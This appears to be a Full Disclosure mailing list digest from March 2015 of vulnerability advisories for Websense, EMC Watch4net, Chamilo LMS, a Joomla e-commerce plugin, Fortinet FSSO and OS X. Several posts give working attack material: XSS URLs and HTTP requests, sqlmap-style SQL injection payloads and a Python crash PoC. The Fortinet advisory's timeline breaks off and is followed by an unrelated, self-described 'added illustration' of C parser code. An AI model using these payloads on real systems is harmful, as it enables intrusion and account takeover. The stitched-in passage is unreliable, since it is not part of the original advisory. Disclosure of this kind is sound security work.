Re: [FD] Multiple Buffer Overflows in Diagnostic Troubleshooting Wizard - msdt.exe - Win 8.0 Pro - x64

2015-03-18 Thread jericho


relevant to your 'buffer overflow' posts that are not real issues:

http://blogs.technet.com/b/markrussinovich/archive/2005/05/17/buffer-overflows.aspx

http://superuser.com/questions/491597/process-monitor-entrys-with-buffer-overflow



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Websense Email Security vulnerable to persistent Cross-Site Scripting in audit log details view

2015-03-18 Thread Securify B.V.


Websense Email Security vulnerable to persistent Cross-Site Scripting in
audit log details view

Han Sahin, September 2014


Abstract

Users of Websense Data Security that are reviewing DLP incidents can be
attacked via Cross-Site Scripting. This issue can be exploited using a
specially crafted email, or by sending a specially crafted HTTP request
through the Websense proxy. The attacker-supplied code can perform a
wide variety of attacks, such as stealing session tokens, login
credentials, performing arbitrary actions as victims, or logging
victims' keystrokes.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

This issue is resolved in TRITON APX Version 8.0. More information about
the fix can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140905/websense_email_security_vulnerable_to_persistent_cross_site_scripting_in_audit_log_details_view.html



[FD] Command injection vulnerability in network diagnostics tool of Websense Appliance Manager

2015-03-18 Thread Securify B.V.


Command injection vulnerability in network diagnostics tool of Websense
Appliance Manager

Han Sahin, September 2014


Abstract

A command injection vulnerability was found in Websense Appliance
Manager that allows an attacker to execute arbitrary code on the
appliance. This issue can be combined with other vulnerabilities, like
Cross-Site Scripting, to perform remote unauthenticated attacks to
compromise the appliance.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense released hotfix 02 for Websense Triton v7.8.4 in which this
issue is fixed. More information about this hotfix can be found at the
following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions

This issue is resolved in TRITON APX Version 8.0. More information about
the fix can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140906/command_injection_vulnerability_in_network_diagnostics_tool_of_websense_appliance_manager.html



[FD] Cross-Site Scripting vulnerability in Websense Explorer report scheduler

2015-03-18 Thread Securify B.V.


Cross-Site Scripting vulnerability in Websense Explorer report scheduler

Han Sahin, September 2014


Abstract

It was discovered that the report scheduler of Websense Explorer is
vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an
attacker to perform a wide variety of actions, such as stealing the
victim's session token or login credentials, performing arbitrary
actions on the victim's behalf, and logging their keystrokes.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense released hotfix 02 for Websense Triton v7.8.4 in which this
issue is fixed. More information about this hotfix can be found at the
following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions

This issue is resolved in TRITON APX Version 8.0. More information about
the fix can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140911/cross_site_scripting_vulnerability_in_websense_explorer_report_scheduler.html



[FD] Missing access control on Websense Explorer web folder

2015-03-18 Thread Securify B.V.


Missing access control on Websense Explorer web folder

Han Sahin, September 2014


Abstract

It was discovered that no access control is enforced on the explorer_wse
path, which is exposed through the web server. An attacker can abuse
this issue to download any file exposed by this path, including security
reports and Websense Explorer configuration files.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

This issue is resolved in TRITON APX Version 8.0. More information about
the fix can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140909/missing_access_control_on_websense_explorer_web_folder.html



[FD] Websense Data Security DLP incident Forensics Preview is vulnerable to Cross-Site Scripting

2015-03-18 Thread Securify B.V.


Websense Data Security DLP incident Forensics Preview is vulnerable to
Cross-Site Scripting

Han Sahin, September 2014


Abstract

Users of Websense Data Security that are reviewing DLP incidents can be
attacked via Cross-Site Scripting. This issue can be exploited using a
specially crafted email, or by sending a specially crafted HTTP request
through the Websense proxy. The attacker-supplied code can perform a
wide variety of attacks, such as stealing session tokens, login
credentials, performing arbitrary actions as victims, or logging
victims' keystrokes.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense created a workaround to address this issue. System - Reporting
- Secure forensics with plain-text

A permanent fix will be included in Websense TRITON APX version 8.1,
scheduled to be released in August, 2015.


Details

https://www.securify.nl/advisory/SFY20140904/websense_data_security_dlp_incident_forensics_preview_is_vulnerable_to_cross_site_scripting.html



[FD] Upcoming new OpenSSL version with high severity security issues

2015-03-18 Thread Patrik Kernstock

Hi,

to just let you know: There is a new OpenSSL version upcoming in about
two days with some fixed security issues with the severity high:

The OpenSSL project team would like to announce the forthcoming release
of OpenSSL versions 1.0.2a, 1.0.1m, 1.0.0r and 0.9.8zf.

These releases will be made available on 19th March. They will fix a
number of security defects. The highest severity defect fixed by these
releases is classified as high severity.

Source is the official OpenSSL announce mailing list:
https://mta.openssl.org/pipermail/openssl-announce/2015-March/20.html

Best regards,
Patrik



[FD] Mac OS X 10.10.2 kernel extension heap overflow resulting in LPE

2015-03-18 Thread Luca Todesco
Hello,

I have recently found an exploitable heap overflow in a core OS X driver.
Particularly, the injectString function is vulnerable to a heap overflow and
can be triggered without privileges of any kind.


The vulnerable function can be seen at 
http://opensource.apple.com/source/IOHIDFamily/IOHIDFamily-503.200.2/IOHIDSystem/IOHIDSecurePromptClient.cpp


I wrote a weaponized poc at http://github.com/kpwn/vpwn.


The KASLR leak included is not reliable across macs. It works only on Macs with 
AMD (no FirePro) GPUs. (Tested on a last gen 5K Retina iMac). 
It was the only one I'd sacrifice for a public PoC because of that constraint.
It's disabled by default too, but it's trivial to enable it by editing 
lsym_priv.h.


It does not completely clean up its own mess, so running ioreg after running
the PoC will likely crash your box. 


The particular IOKit service has been involved in a CVE in October. It had 
functions that could literally not be used without crashing the kernel. 
There still are other unsafe functions in that very same file. Apple has 
disabled the service in particular on the latest 10.10.3 beta possibly due to
those other bugs. I do not believe they are aware of this issue in particular. 
But this is pure speculation, and it doesn't matter in the end, since the 
vulnerability cannot be triggered anymore.


Let me know what you think and sorry for the wall of text,
Luca Todesco.
-qwertyoruiop


[FD] Mac OS X 10.10.2 IOHIDFamily.kext IOHIDSecurePromptClient Heap Overflow

2015-03-18 Thread info
Hello,

I have recently found an exploitable heap overflow in a core OS X driver.
Particularly, the injectString function is vulnerable to a heap overflow and
can be triggered without privileges of any kind.

The vulnerable function can be seen at 
http://opensource.apple.com/source/IOHIDFamily/IOHIDFamily-503.200.2/IOHIDSystem/IOHIDSecurePromptClient.cpp

I wrote a weaponized poc at http://github.com/kpwn/vpwn.

The KASLR leak is not reliable. It works only on Macs with AMD (no FirePro) 
GPUs. (Tested on a last gen 5K Retina iMac).
It was the only one I'd sacrifice for a public PoC because of that constraint.

It does not completely clean up its own mess, so running ioreg after running
the PoC will likely crash your box. 

The particular IOKit service has been involved in a CVE in October. It had 
functions that could literally not be used without crashing the kernel. 
There still are other unsafe functions in that very same file. Apple has 
disabled the service in particular on the latest 10.10.3 beta possibly due to
those other bugs. I do not believe they are aware of this issue in particular. 
But this is pure speculation, and it doesn't matter in the end, since the 
vulnerability cannot be triggered anymore.

Let me know what you think,
Luca Todesco.
-qwertyoruiop



[FD] Chamilo LMS 1.9.10 Multiple XSS CSRF Vulnerabilities

2015-03-18 Thread Rehan Ahmed
I. Overview 
 
Chamilo LMS 1.9.10 or prior versions are prone to multiple Cross-Site
Scripting (Stored + Reflected) & CSRF vulnerabilities. These vulnerabilities
allow an attacker to gain control over valid user accounts in LMS, perform
operations on their behalf, redirect them to malicious sites, steal their
credentials, and more.

II. Severity 
 
Rating: High 
Remote: Yes 
Authentication Required: Yes
CVE-ID: 

III. Vendor's Description of Application 
 
Chamilo LMS, or Chamilo Learning Management System is a piece of software that 
allows you to create a virtual campus for the provision of online or 
semi-online training. It is distributed under the GNU/GPLv3+ license and its 
development process is public. All the Chamilo software products are entirely 
free (as in freedom), free (as in beer) and complete, and are production-ready 
without requiring any type of payment. 

https://chamilo.org/chamilo-lms/ 

IV. Vulnerability Details & Exploit
 
1) Multiple Reflected XSS Request 

Request Method = GET 

XSS PoC's:- 

/main/calendar/agenda_list.php?type=personal%27%20onmouseover=%27confirm%280%29%27/%3E%3C!--
/main/messages/outbox.php?f=social+onmouseover=confirm(0)
/main/mySpace/student.php?keyword=31337+onmouseover=confirm(0)//&active=0&_qf__search_user=&submit=Search
/main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax_get_file_listing.php?editor=stand_alone&view=thumbnail&search=1&search_name=admin&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=;</script><script>confirm(0)</script>
/main/admin/configure_extensions.php?display=</script><script>confirm(0)</script>
/main/admin/course_category.php?action=add&category=</script>confirm(0)</script>
/main/admin/session_edit.php?page=resume_session.php%22%20onmouseover=confirm%280%29//&id=1

b) User Agent Header XSS (Reflected)
GET /main/admin/system_status.php?section=webserver
User-Agent: <script>confirm(0)</script>
__ 

2) Stored XSS 

File Attachment Description parameter (legend[]) is vulnerable to Stored XSS. By
utilizing the social network, an attacker may send a crafted message to anybody
with an XSS payload in the file attachment description field (i.e. legend[]).

Request Method : POST 
Location = /main/messages/new_message.php?f=social 
Parameter = legend[] 

Stored XSS PoC :- 

POST /main/messages/new_message.php?f=social HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/main/messages/new_message.php?f=social
Cookie: XX
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---8461144986726
Content-Length: 1023

-8461144986726
Content-Disposition: form-data; name="users[]"

3
-8461144986726
Content-Disposition: form-data; name="title"

Stored XSS Test Via Social network
-8461144986726
Content-Disposition: form-data; name="content"

This is test message<BR>
-8461144986726
Content-Disposition: form-data; name="attach_1"; filename="test.txt"
Content-Type: text/plain

I owned you
-8461144986726
Content-Disposition: form-data; name="legend[]"

Cool File <script>confirm(0)</script>
-8461144986726
Content-Disposition: form-data; name="compose"


-8461144986726
Content-Disposition: form-data; name="_qf__compose_message"


-8461144986726
Content-Disposition: form-data; name="sec_token"

42917ca29da38f60d49bbaf2ba89b1b9
-8461144986726--
 

3) CSRF & Stored XSS Request

Method = POST 
Location = /main/admin/session_add.php 
Parameter = name 

POST /main/admin/session_add.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1//main/admin/session_add.php
Cookie: XX
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231

formSent=1&name=<script>confirm(0)</script>&coach_username=rehan&session_category=0&nb_days_acess_before=0&nb_days_acess_after=0&start_limit=on&day_start=2&month_start=3&year_start=2015&end_limit=on&day_end=2&month_end=3&year_end=2016&session_visibility=2

CSRF PoC:-

<html>
<!-- CSRF Request With Stored XSS Payload -->
<body>
<form

[FD] Web-Dorado ECommerce-WD for Joomla plugin multiple unauthenticated SQL injections

2015-03-18 Thread Brandon Perry
Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple
unauthenticated SQL injections available via the advanced search
functionality.

http://extensions.joomla.org/extension/ecommerce-wd

The vulnerable parameters are search_category_id, sort_order, and
filter_manufacturer_ids within the following request:

POST /index.php?option=com_ecommercewd&controller=products&task=displayproducts HTTP/1.1
Host: 172.31.16.49
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.31.16.49/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=120
Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321

product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12


Vectors:

Parameter: filter_manufacturer_ids (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND 8066=8066 AND
(7678=7678&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
(1212=1212&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1)
AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND
(1480=1480&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12



Parameter: search_category_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND 3039=3039 AND
(6271=6271&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT
(ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND
(8257=8257&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND
(1251=1251&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload:
product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1)
UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)--
&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12



Parameter: sort_order (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
Payload:

Re: [FD] Regarding how can I request a CVE number?

2015-03-18 Thread James Hooker
Hi XZ,

I managed to get a number of CVEs last year, but towards the end of the
year they simply stopped replying, so I've given up. Whether they stopped
replying due to workload, or whether my submissions were not up to their
requirements I'm not sure.

If you find out any more, I'd be interested in knowing why they've stopped
assigning CVEs to certain submission sources.

Kind regards,
James H

On Tue, Mar 17, 2015 at 11:25 PM, XiaopengZhang <tfr...@yeah.net> wrote:

> Hi Guys,
>
> I discovered several Vuls and have reported them to the vendors, so I'd
> like to request the CVE for them. (The vendor did not want to request CVE)
>
> I have sent some emails to cve-ass...@mitre.org for applying for CVE.
> But so far still nobody replies to them. I don't know what happened to this
> email box.
> Is my email recognised as spam? Or do I need to write the email content in a
> special format?
>
> So please, can somebody here help me?
> Thanks
>
> Best wishes,
> XZ




[FD] Multiple Cross-Site Scripting vulnerabilities in Websense Reporting

2015-03-18 Thread Securify B.V.


Multiple Cross-Site Scripting vulnerabilities in Websense Reporting

Han Sahin, September 2014


Abstract

It has been found that Websense Reporting is affected by multiple
Cross-Site Scripting issues. Cross-Site Scripting allows an attacker to
perform a wide variety of actions, such as stealing the victim's session
token or login credentials, performing arbitrary actions on the victim's
behalf, and logging their keystrokes.


Tested versions

This issue was discovered on Websense Triton v7.8.3 and Websense
appliance modules V-Series v7.7. Other versions may be affected as well.


Fix

Websense released hotfix 02 for Websense Triton v7.8.4 in which this
issue is fixed. More information about this hotfix can be found at the
following location:
http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions

This issue is resolved in TRITON APX Version 8.0. More information about
the fix can be found at the following location:
http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0


Details

https://www.securify.nl/advisory/SFY20140914/multiple_cross_site_scripting_vulnerabilities_in_websense_reporting.html



[FD] [CORE-2015-0006] - Fortinet Single Sign On Stack Overflow

2015-03-18 Thread CORE Advisories Team
1. Advisory Information


Title: Fortinet Single Sign On Stack Overflow
Advisory ID: CORE-2015-0006
Advisory URL: 
http://www.coresecurity.com/advisories/fortinet-single-sign-on-stack-overflow
Date published: 2015-03-18
Date of last update: 2015-03-18
Vendors contacted: Fortinet
Release mode: Coordinated release


2. Vulnerability Information


Class: Stack-based Buffer Overflow [CWE-121]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2281

 

3. Vulnerability Description


Through Fortinet [1] Single Sign On or Single User Sign On, users logged on
to a computer network are authenticated for access to network resources through 
the FortiGate unit without having to enter their username and password again. 
Fortinet Single Sign On (FSSO) provides Single Sign On capability for Microsoft 
Windows networks using either Active Directory or NTLM authentication and 
Novell networks, using eDirectory.

FSSO [4] monitors user logons and sends the FortiGate unit the username, IP 
address, and the list of Windows AD user groups to which the user belongs. When 
the user tries to access network resources, the FortiGate unit selects the 
appropriate security policy for the destination. If the user belongs to one of 
the permitted user groups, the connection is allowed.

There is a vulnerability in the message dispatcher used by FSSO Windows Active 
Directory and FSSO Novell eDirectory. Exploitation of this vulnerability might 
lead to a full network compromise.


4. Vulnerable packages


 - FSSO Windows Active Directory 4.3.0161 (4.3.0151, 4.3.0129 were also tested 
and found vulnerable)
 - FSSO Novell eDirectory 4.3.0161

Other versions are probably affected too, but they were not checked.


5. Vendor Information, Solutions and Workarounds


Core Security recommends those affected use third party software such as 
Sentinel [3] or EMET [2] that could help to prevent the exploitation of 
affected systems to some extent.

Fortinet published the following FortiGuard Bulletin: [5]


6. Credits


This vulnerability was discovered and researched by Enrique Nissim in 
collaboration with Andres Lopez Luksenberg, both from the Core Security Exploit 
Writing Team. The publication of this advisory was coordinated by Joaquín 
Rodríguez Varela from Core Security Advisories Team.

 

7. Technical Description / Proof of Concept Code


[CVE-2015-2281] The vulnerability in both cases can be exploited by sending a 
special packet to the services without being authenticated (pre-auth).

Given that both software systems require an Administrative account in order to
run (Windows Domain Admin or eDirectory Admin accordingly), the full network is
exposed. Pre-authenticated Remote Code Execution with Domain Administrative
rights is possible.

The vulnerability is located in the Message Dispatcher for message 
PROCESS_HELLO. Here is a PoC (Proof of Concept) that causes the application 
thread with the FortiGate appliance to crash:


import socket
import struct

TARGET_IP = "192.168.233.100"

def play():

    message = "\x80\x01\x42\x42"
    buff = "A" * 248
    buff += "B" * (0xf - len(buff))
    payload = struct.pack("I", 0x000f) + message + buff

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, 8000))
    s.send(payload)
    buff_recv = s.recv(6000)
    print buff_recv
    s.close()

play()


8. Report Timeline


2015-01-07: Core Security notifies Fortinet of the vulnerabilities. Publication 
date is set for February 2nd, 2015.
2015-01-09: Fortinet requests a copy of the advisory draft.
2015-01-09: Core Security sends a draft copy of the advisory to the vendor.
2015-01-14: Fortinet informs they are in the process of validating the report 
and asks if we want to commit to responsible disclosure.
2015-01-14: Core Security informs the vendor that our policy is to publish our 
findings in order to help the users to gain awareness of the issues and 
therefore allowing them to take the necessary precautions to protect 
themselves. We informed them that we always try to release our findings in a 
coordinated manner provided that the time the vendor takes to test and fix the
issue is reasonable and the publication of this solution and our disclosure is 
agreed between the two parties.
2015-01-21: Core Security asks the vendor if they were able to review the 
vulnerabilities and a tentative date for publishing the fix and consequently 
the advisory.
2015-01-27: Fortinet acknowledges the vulnerabilities and informs that a fix of 
the source code is in order. They say they'll keep us updated regarding the
release schedule.
2015-02-24: Fortinet informed us that the current ETA was the first week of 
March, but that it could be changed depending on their engineering load.
2015-02-24: Core Security requested a specific date considering that the first 
week of March was next week.
2015-02-27: Fortinet informed us that they currently don't have a fixed date. 
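
As an added illustration (not Core Security's or Fortinet's code), here is a receive-side parser for the frame shape the PoC above sends: a 4-byte length word, a 4-byte message header and a body. The receiver's fixed-size body buffer, its 248-byte size, the error codes and the little-endian length are assumptions; the point is that the attacker-controlled length is checked against both the bytes actually received and the destination buffer before anything is copied, which is the check a stack-based overflow of this class (CWE-121) lacks.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Frame shape taken from the advisory's PoC: a 4-byte little-endian length
 * word, a 4-byte message header (the PoC sends "\x80\x01\x42\x42"), then a
 * body. Everything about the receiver is hypothetical: a fixed-size body
 * buffer sized to the PoC's 248-byte 'A' run, and a parser that refuses any
 * frame that would not fit in it. This is not FSSO's dispatcher. */
#define MSG_HDR_LEN 4u
#define MAX_BODY    248u

enum hello_err {
    HELLO_TRUNCATED = -1,  /* declared length exceeds the bytes received */
    HELLO_BAD_LEN   = -2,  /* declared length cannot even hold the header */
    HELLO_TOO_LONG  = -3   /* body larger than the receiver's buffer */
};

struct hello_msg {
    uint8_t hdr[MSG_HDR_LEN];
    uint8_t body[MAX_BODY];
    size_t  body_len;
};

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parses one frame from 'pkt'. Returns the number of bytes consumed on
 * success (trailing bytes are left for the next frame) or a negative
 * hello_err. The attacker-controlled length word is validated against both
 * the bytes actually received and the destination buffer *before* any copy;
 * omitting the second check is the CWE-121 pattern the advisory describes. */
int parse_hello(const uint8_t *pkt, size_t pkt_len, struct hello_msg *out)
{
    if (pkt_len < 4 + MSG_HDR_LEN)
        return HELLO_TRUNCATED;

    uint32_t declared = le32(pkt);
    if (declared < MSG_HDR_LEN)
        return HELLO_BAD_LEN;
    if ((size_t)declared > pkt_len - 4)
        return HELLO_TRUNCATED;

    size_t body_len = declared - MSG_HDR_LEN;
    if (body_len > MAX_BODY)
        return HELLO_TOO_LONG;           /* would overrun out->body */

    memcpy(out->hdr, pkt + 4, MSG_HDR_LEN);
    memcpy(out->body, pkt + 4 + MSG_HDR_LEN, body_len);
    out->body_len = body_len;
    return (int)(4 + declared);
}

/* Builds a constructed test frame in 'buf' with an arbitrary declared length
 * and body size, mirroring the PoC's shape. Returns bytes written, 0 if the
 * frame does not fit. */
size_t build_frame(uint8_t *buf, size_t cap, uint32_t declared, size_t body_len)
{
    size_t total = 4 + MSG_HDR_LEN + body_len;
    if (total > cap)
        return 0;
    buf[0] = (uint8_t)declared;
    buf[1] = (uint8_t)(declared >> 8);
    buf[2] = (uint8_t)(declared >> 16);
    buf[3] = (uint8_t)(declared >> 24);
    memcpy(buf + 4, "\x80\x01\x42\x42", MSG_HDR_LEN);
    memset(buf + 4 + MSG_HDR_LEN, 'A', body_len);
    return total;
}

int main(void)
{
    uint8_t buf[1024];
    struct hello_msg m;
    /* The PoC's frame: declared length 0xf, but 248 bytes of body follow. */
    size_t n = build_frame(buf, sizeof buf, 0x0f, 248);
    int rc = parse_hello(buf, n, &m);          /* consumes 19 bytes, copies 11 */
    /* A frame whose declared length would overrun the body buffer. */
    size_t big = build_frame(buf, sizeof buf, MSG_HDR_LEN + MAX_BODY + 1, MAX_BODY + 1);
    int rc_big = parse_hello(buf, big, &m);    /* HELLO_TOO_LONG, nothing copied */
    return (rc == 19 && rc_big == HELLO_TOO_LONG) ? 0 : 1;
}
```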

[FD] EMC M&R (Watch4net) data storage collector credentials are not properly protected

2015-03-18 Thread Securify B.V.


EMC M&R (Watch4net) data storage collector credentials are not properly
protected

Han Sahin, November 2014


Abstract

It was discovered that EMC M&R (Watch4net) credentials of remote servers
stored in Watch4net are encrypted using a fixed hardcoded password. If
an attacker manages to obtain a copy of the encrypted credentials, it is
trivial to decrypt them.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC M&R (Watch4Net) versions prior to 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0514
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC M&R (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141101/emc_m_r__watch4net__data_storage_collector_credentials_are_not_properly_protected.html



[FD] Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal Report Favorites

2015-03-18 Thread Securify B.V.


Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal
Report Favorites

Han Sahin, November 2014


Abstract

A Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)
Web Portal. This issue allows attackers to replace the report that is
shown at startup; the attacker's payload will be stored in the user's
profile and will be executed every time the victim logs in. The
attacker-supplied code can perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, performing
arbitrary actions on their behalf, logging their keystrokes, or exploiting
issues in other areas of Watch4net.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC M&R (Watch4Net) versions prior to 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0513
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC M&R (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141102/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__web_portal_report_favorites.html



[FD] Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Centralized Management Console

2015-03-18 Thread Securify B.V.


Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Centralized
Management Console

Han Sahin, November 2014


Abstract

A Cross-Site Scripting vulnerability was found in EMC MR (Watch4net)
Centralized Management Console. This issue allows attackers to perform a
wide variety of actions, such as stealing victims' session tokens or
login credentials, performing arbitrary actions on their behalf, logging
their keystrokes, or exploiting issues in other areas of Watch4net.


Affected products

EMC reports that the following products are affected by this
vulnerability:

- EMC MR (Watch4Net) versions prior to 6.5u1
- EMC ViPR SRM versions prior to 3.6.1


See also

- CVE-2015-0513
- ESA-2015-004: EMC MR (Watch4Net) Multiple Vulnerabilities


Fix

EMC released the following updated versions that resolve this
vulnerability:

- EMC MR (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1

Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.


Details

https://www.securify.nl/advisory/SFY20141103/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__centralized_management_console.html



[FD] Cross-Site Scripting vulnerability in EMC MR (Watch4net) Alerting Frontend

2015-03-18 Thread Securify B.V.


Cross-Site Scripting vulnerability in EMC MR (Watch4net) Alerting
Frontend

Han Sahin, November 2014


Abstract

A Cross-Site Scripting vulnerability was found in EMC MR (Watch4net)
Alerting Frontend. This issue allows attackers to perform a wide
variety of actions, such as stealing victims' session tokens or login
credentials, performing arbitrary actions on their behalf, logging their
